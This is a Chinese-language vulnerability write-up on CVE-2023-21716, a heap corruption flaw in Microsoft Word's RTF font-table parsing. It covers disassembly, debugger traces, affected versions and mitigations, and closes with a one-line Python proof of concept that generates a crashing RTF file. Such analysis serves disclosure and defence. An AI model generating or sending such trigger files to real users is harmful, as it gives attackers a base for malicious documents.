【POC】Microsoft Word远程代码执行漏洞(CVE-2023-21716)
作者:Sec-Labs | 发布时间:
漏洞介绍
微软Office的wwlib存在漏洞,攻击者可以利用打开恶意RTF文档的受害者的权限实现远程代码执行。攻击者可以将此文件作为电子邮件附件(或其他方式)传递。
项目地址
CVE-2023-21716 微软 Word RTF 字体表堆栈破坏漏洞
微软 Office 中的 wwlib 存在漏洞,允许攻击者使用受害者的权限实现远程代码执行,只要受害者打开了恶意 RTF 文档。攻击者可以通过电子邮件附件(或其他方式)传送此文件。
背景
Microsoft Word 是 Microsoft Office 中包含的文字处理应用程序。默认情况下,Microsoft Word 处理 Rich-Text Format (RTF) 文档。这些文档主要由基于 7 位 ASCII 的关键字组成,这些关键字可以封装各种丰富的内容。
漏洞细节
Microsoft Word 中的 RTF 解析器在处理包含大量字体 (\f###) 的字体表 (\fonttbl) 时存在堆栈破坏漏洞。在处理字体时,字体 ID 值 (在 \f 后面的数字) 由以下代码处理:
{% highlight asm %} 0d6cf0b6 0fbf0e movsx ecx,word ptr [esi] ; 加载基本idx 0d6cf0b9 0fbf5602 movsx edx,word ptr [esi+2] ; 加载字体idx 0d6cf0bd 8d1451 lea edx, [ecx+edx2] ; 0d6cf0c0 668b08 mov cx,word ptr [eax] ; 载入代码页值 0d6cf0c3 66894c5604 mov word ptr [esi+edx2+4],cx ; 写入代码页 {% endhighlight %}.
如图所示,字体ID值被0xd6cf0c3的 "movsx "指令加载。这条指令对加载的值进行了符号扩展,从而用fff填充edx的上位。下面的调试器摘录说明了运行时的行为。
*** edx will become: 0x17fc8 (from 0x7fec+0x7fee*2)
*** edx will become: 0x17fc9 (from 0x7fed+0x7fee*2)
*** edx will become: 0x17fde (from 0x7fee+0x7ff8*2)
*** edx will become: 0x17fdf (from 0x7fef+0x7ff8*2)
*** edx will become: 0x17fe0 (from 0x7ff0+0x7ff8*2)
*** edx will become: 0x17fe1 (from 0x7ff1+0x7ff8*2)
*** edx will become: 0x17fe2 (from 0x7ff2+0x7ff8*2)
*** edx will become: 0x17fe3 (from 0x7ff3+0x7ff8*2)
*** edx will become: 0x17fe4 (from 0x7ff4+0x7ff8*2)
*** edx will become: 0x17fe5 (from 0x7ff5+0x7ff8*2)
*** edx will become: 0x17fe6 (from 0x7ff6+0x7ff8*2)
*** edx will become: 0x17fe7 (from 0x7ff7+0x7ff8*2)
*** edx will become: 0xffff7ffc (from 0x7ff8+0xffff8002*2)当这种情况发生时,位于0xd6cf0c3的内存写入指令通过将字体代码页写入esi中保存的内存的负偏移量而破坏了堆。下面的调试器摘录显示了越界的内存写入。
*** writing 0x4e4 to 0xd35ddb4 [0xd32de20+0x17fc8*2+4]
*** writing 0x4e4 to 0xd35ddb6 [0xd32de20+0x17fc9*2+4]
*** writing 0x4e4 to 0xd35dde0 [0xd32de20+0x17fde*2+4]
*** writing 0x4e4 to 0xd35dde2 [0xd32de20+0x17fdf*2+4]
*** writing 0x4e4 to 0xd35dde4 [0xd32de20+0x17fe0*2+4]
*** writing 0x4e4 to 0xd35dde6 [0xd32de20+0x17fe1*2+4]
*** writing 0x4e4 to 0xd35dde8 [0xd32de20+0x17fe2*2+4]
*** writing 0x4e4 to 0xd35ddea [0xd32de20+0x17fe3*2+4]
*** writing 0x4e4 to 0xd35ddec [0xd32de20+0x17fe4*2+4]
*** writing 0x4e4 to 0xd35ddee [0xd32de20+0x17fe5*2+4]
*** writing 0x4e4 to 0xd35ddf0 [0xd32de20+0x17fe6*2+4]
*** writing 0x4e4 to 0xd35ddf2 [0xd32de20+0x17fe7*2+4]
*** writing 0x4e4 to 0xd31de1c [0xd32de20+0xffff7ffc*2+4]在这种内存损坏之后,会发生额外的处理。通过适当的堆布局,攻击者可以通过堆损坏产生任意代码执行。
使用下面提供的概念验证代码,处理最终到达后处理清理代码。正如预期的那样,RtlFreeHeap被调用并检测到堆损坏,如下所示。
Critical error detected c0000374
(3ba8.21f4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll_77a40000!RtlReportCriticalFailure+0x4b:
77b27012 cc int 3
0:000:x86> kv
# ChildEBP RetAddr Args to Child
00 008f3834 77b30114 00000001 77b63990 77b2e009 ntdll_77a40000!RtlReportCriticalFailure+0x4b (FPO: [Non-Fpo])
01 008f3840 77b2e009 70dcf286 00000000 1ff78c20 ntdll_77a40000!RtlpReportHeapFailure+0x2f (FPO: [0,0,4])
02 008f3870 77b36480 00000003 00a50000 1ff78c20 ntdll_77a40000!RtlpHpHeapHandleError+0x89 (FPO: [Non-Fpo])
03 008f3888 77b2dd17 1ff78c20 0000000a 00000000 ntdll_77a40000!RtlpLogHeapFailure+0x43 (FPO: [Non-Fpo])
04 008f38ec 77a83f8d 00a50258 70dcf0be 1ff78c20 ntdll_77a40000!RtlpAnalyzeHeapFailure+0x281 (FPO: [Non-Fpo])
05 008f3a48 77ac7b9d 1ff78c20 1ff78c28 1ff78c28 ntdll_77a40000!RtlpFreeHeap+0x24d (FPO: [Non-Fpo])
06 008f3aa4 77a83ce6 00000000 00000000 00000000 ntdll_77a40000!RtlpFreeHeapInternal+0x783 (FPO: [Non-Fpo])
07 008f3ac4 05343c06 00a50000 00000000 1ff78c28 ntdll_77a40000!RtlFreeHeap+0x46 (FPO: [Non-Fpo])
08 008f3adc 06e6e330 1ff78c28 06c8dc6d 08a11040 mso20win32client!Mso::Memory::Free+0x47 (FPO: [Non-Fpo])
09 008f3b0c 0430b5af 08a1104c 08a11040 08a11044 mso!MsoFreePpv+0x84 (FPO: [Non-Fpo])
0a 008f3b28 0430bed0 008f9f0c 008f586c ffffffff wwlib!FreeHribl+0x8c (FPO: [Non-Fpo])
0b 008f3b70 033be323 40280000 00200002 1a772b98 wwlib!PdodCreateRtf+0x243 (FPO: [6,13,4])
0c 008f52bc 02e465db 04012000 20280000 00200002 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x1e0966
0d 008f5600 03031155 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x321 (FPO: [Non-Fpo])
0e 008f5680 0301583a 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4])
0f 008f8c4c 030175d4 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0xf3b (FPO: [Non-Fpo])
10 008f8d14 03c43d9b 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0])
11 008f9e40 03c43a92 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2f6 (FPO: [Non-Fpo])
12 008f9e7c 0343bd43 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0])
13 008fb31c 02d17666 00000001 00000000 02d17609 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x271a8e
14 008fb554 02c594f5 71fc93df 7625f550 0000000a wwlib!Boot::IfrParseCommandLine2+0x5d (FPO: [Non-Fpo])
15 008fb5c8 02c59317 008fb5f8 02c50000 02c58ff4 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo])
16 008ff684 02c59058 96c6d88c 000800e4 71fcd0a7 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo])
17 008ff6b8 00dd1917 00dd0000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo])
18 008ff908 00dd114a 00dd0000 00000000 00a54944 winword!WinMain+0x146 (FPO: [Non-Fpo])
19 008ff954 7625fa29 0069a000 7625fa10 008ff9c0 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo])
1a 008ff964 77aa7bbe 0069a000 70dc3336 00000000 KERNEL32!BaseThreadInitThunk+0x19 (FPO: [Non-Fpo])
1b 008ff9c0 77aa7b8e ffffffff 77ac8d0f 00000000 ntdll_77a40000!__RtlUserThreadStart+0x2f (FPO: [SEH])
1c 008ff9d0 00000000 00dd1000 0069a000 00000000 ntdll_77a40000!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])分析师还可以使用Page Heap来验证代码是否试图越界写入。这样做的结果如下。
(afe8.9a5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
wwlib!FSearchFtcmap+0x150:
0dc1f0c3 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:1ebf2fec=????
0:000:x86> kv
# ChildEBP RetAddr Args to Child
00 0135135c 0dc0fa17 013513ec 00000001 013513d8 wwlib!FSearchFtcmap+0x150 (FPO: [Non-Fpo])
01 01353828 0dc0ddb5 ddc5a2cb 0b3d3028 000ad400 wwlib!RtfInRare+0x1845 (FPO: [Non-Fpo])
02 01353c5c 0ef5c473 00000200 0b3d3028 66565a58 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo])
03 01353eac 0ef5be04 0b3d302c 0135a294 01355bf4 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo])
04 01353ef8 0e00e323 40280000 00200002 45646f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4])
05 01355644 0da965db 04012000 20280000 00200002 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x1e0966
06 01355988 0dc81155 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x321 (FPO: [Non-Fpo])
07 01355a08 0dc6583a 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4])
08 01358fd4 0dc675d4 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0xf3b (FPO: [Non-Fpo])
09 0135909c 0e893d9b 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0])
0a 0135a1c8 0e893a92 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2f6 (FPO: [Non-Fpo])
0b 0135a204 0e08bd43 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0])
0c 0135b6a4 0d967666 00000001 00000000 0d967609 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x271a8e
0d 0135b8dc 0d8a94f5 ddc527df 7625f550 0000000a wwlib!Boot::IfrParseCommandLine2+0x5d (FPO: [Non-Fpo])
0e 0135b954 0d8a9317 0135b984 0d8a0000 0d8a8ff4 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo])
0f 0135fa10 0d8a9058 cbd5c9e4 00080138 ddc564d3 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo])
10 0135fa44 00dd1917 00dd0000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo])
11 0135fc94 00dd114a 00dd0000 00000000 05e18ff4 winword!WinMain+0x146 (FPO: [Non-Fpo])
12 0135fce0 7625fa29 011cf000 7625fa10 0135fd4c winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo])
13 0135fcf0 77aa7bbe 011cf000 96082e8a 00000000 KERNEL32!BaseThreadInitThunk+0x19 (FPO: [Non-Fpo])
14 0135fd4c 77aa7b8e ffffffff 77ac8d34 00000000 ntdll_77a40000!__RtlUserThreadStart+0x2f (FPO: [SEH])
15 0135fd5c 00000000 00dd1000 011cf000 00000000 ntdll_77a40000!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])受影响的版本
该漏洞至少影响到以下版本的Microsoft Office。
- Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
- 微软Office 2016(包括内部慢速版--1704 Build 8067.2032 CTR)。
- 微软Office 2013
- 微软Office 2010
- 微软Office 2007
更早的版本也可能受到影响,但没有测试。此外,这个漏洞的技术细节多年来一直在演变。
缓解措施
微软Office 2010及以后版本使用保护视图来限制从不可信任的来源获得的恶意文件造成的损害。当该漏洞出现时,保护视图是有效的,因此需要一个额外的沙盒逃逸漏洞来获得全部权限。
移除RTF扩展名的文件关联是无效的,因为使用DOC扩展名仍然可以接触到脆弱的代码。
POC
下面的Python脚本将生成一个触发这个问题的文件。
open("exploit.rtf", "wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rt''lch no crash??}\n}}\n").encode('utf-8'))
标签:工具分享, 漏洞分享, POC脚本